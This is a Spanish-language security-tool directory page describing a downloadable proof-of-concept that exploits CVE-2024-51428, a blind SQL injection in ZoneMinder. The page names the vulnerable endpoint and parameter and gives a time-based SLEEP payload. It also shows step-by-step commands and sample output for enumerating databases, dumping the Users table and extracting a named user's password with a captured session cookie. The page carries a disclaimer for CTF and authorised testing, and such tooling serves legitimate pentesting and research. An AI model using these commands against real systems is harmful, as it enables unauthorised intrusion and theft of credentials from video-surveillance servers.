Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-51428-PoC — Wrapper en Python para explotar CVE-2024-51428 en ZoneMinder usando Inyección SQL Ciega con sqlmap, automatizando la enumeración de bases de datos, tablas y extracción de datos con una salida limpia. | Kitploit
Herramientas/GitHubGitHub/d1se0/cve-2024-51428-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y Educación
GitHubd1se0/cve-2024-51428-poc

CVE-2024-51428-PoC

Wrapper en Python para explotar CVE-2024-51428 en ZoneMinder usando Inyección SQL Ciega con sqlmap, automatizando la enumeración de bases de datos, tablas y extracción de datos con una salida limpia.

Ver Repositorio
11hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-51428 - PoC de Inyección SQL Ciega en ZoneMinder

Wrapper de Python para sqlmap diseñado para explotar CVE-2024-51428 en ZoneMinder.
Esta herramienta automatiza la detección y explotación de una inyección SQL ciega, manteniendo una salida limpia y centrada en los datos útiles.

El script oculta los registros de sqlmap y solo muestra información relevante como:

  • Punto de inyección detectado
  • Nombres de bases de datos
  • Tablas
  • Credenciales o datos sensibles extraídos

Esto hace que la herramienta sea ideal para entornos CTF, demostraciones y pruebas de seguridad.


Resumen de la Vulnerabilidad

CVE: CVE-2024-51428
Tipo: Inyección SQL Ciega
Software afectado: ZoneMinder
Vector de ataque: Parámetro HTTP GET
Parámetro: tid

La vulnerabilidad existe en el siguiente endpoint:

root@kitploit:~
/zm/index.php?view=request&request=event&action=removetag&tid=

El parámetro tid no se sanitiza correctamente antes de usarse en una consulta a la base de datos, lo que permite a los atacantes inyectar consultas SQL.

La técnica de explotación utilizada es inyección SQL ciega basada en tiempo.

Ejemplo de payload descubierto por sqlmap:

root@kitploit:~
tid=1 AND (SELECT 3475 FROM (SELECT(SLEEP(5)))BZWD)

Este payload obliga a la base de datos a dormir si la consulta se ejecuta correctamente, confirmando la presencia de la inyección SQL.


Características

  • Detección automática de inyección SQL ciega
  • Enumeración de bases de datos
  • Enumeración de tablas
  • Volcado de tablas
  • Filtrado de columnas
  • Filtrado de filas
  • Salida limpia (registros de sqlmap ocultos)
  • Diseñado para CTF y laboratorios de pentesting

Requisitos

  • Python 3
  • sqlmap

Instala sqlmap si es necesario:

root@kitploit:~
sudo apt install sqlmap

Uso

Sintaxis básica:

root@kitploit:~
python3 poc.py --url <TARGET_URL> -c '<ZMSESSID_COOKIE>'

Con este comando comprobamos si es vulnerable o no

Ejemplo:

root@kitploit:~
python3 poc.py --url http://target.htb -c '151fvdqmjkhnkfat7l5epgmd22'

Obteniendo la Cookie Requerida

El exploit requiere una cookie de sesión válida de ZoneMinder.

Pasos:

  1. Abre el objetivo en tu navegador
  2. Abre las herramientas de desarrollo
  3. Navega a:
root@kitploit:~
Application → Cookies
  1. Localiza la cookie llamada:
root@kitploit:~
ZMSESSID
  1. Copia su valor y úsalo con -c

Ejemplo:

root@kitploit:~
-c '151fvdqmjkhnkfat7l5epgmd22'

Comprobando si el Objetivo es Vulnerable

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE'

Ejemplo de salida:

root@kitploit:~
[*] Checking vulnerability...

Parameter: tid (GET)
Type: time-based blind
Payload: tid=1 AND (SELECT(SLEEP(5)))

[+] TARGET IS VULNERABLE TO BLIND SQL INJECTION

Enumerando Bases de Datos

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d

Ejemplo de salida:

root@kitploit:~
available databases [3]:
information_schema
mysql
zm

Enumerando Tablas

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm

Ejemplo de salida:

root@kitploit:~
Database: zm

Users
Events
Monitors
Storage

Volcando una Tabla

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Users

Volcando una Columna Específica

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Users -f Username

Ejemplo:

root@kitploit:~
+----------+
| Username |
+----------+
| admin    |
| viewer   |
+----------+

Filtrando Filas (cláusula WHERE)

Puedes filtrar filas usando:

root@kitploit:~
-ff <COLUMN> <VALUE>

Ejemplo:

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Password -ff Username mark

SQL equivalente:

root@kitploit:~
WHERE Username='mark'

Volcando la Contraseña de un Usuario Específico

Ejemplo:

root@kitploit:~
python3 poc.py \
--url http://target.htb \
-c 'COOKIE' \
-d -db zm -t Users \
-f Password \
-ff Username mark

Comando interno de sqlmap:

root@kitploit:~
sqlmap -D zm -T Users -C Password --where="Username='mark'" --dump

Cómo Funciona la Herramienta

El script actúa como un envoltorio alrededor de sqlmap.

Pasos realizados internamente:

  1. Construye el endpoint vulnerable
root@kitploit:~
/zm/index.php?view=request&request=event&action=removetag&tid=1
  1. Pasa la cookie de autenticación a sqlmap
  2. Ejecuta sqlmap con opciones optimizadas:
root@kitploit:~
--threads=10
--technique=T
--batch
  1. Analiza la salida de sqlmap en tiempo real
  2. Filtra los registros y muestra solo:
  • información de inyección
  • bases de datos
  • tablas
  • datos volcados

Uso Previsto

Esta herramienta fue creada para:

  • Desafíos Capture The Flag
  • Investigación de seguridad
  • Fines educativos
  • Laboratorios de pentesting

Descargo de Responsabilidad

Este proyecto se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.

El autor no es responsable del mal uso de esta herramienta.

Siempre obtén la autorización adecuada antes de probar cualquier sistema.


Autor

Security Research / CTF tooling

Descargar herramienta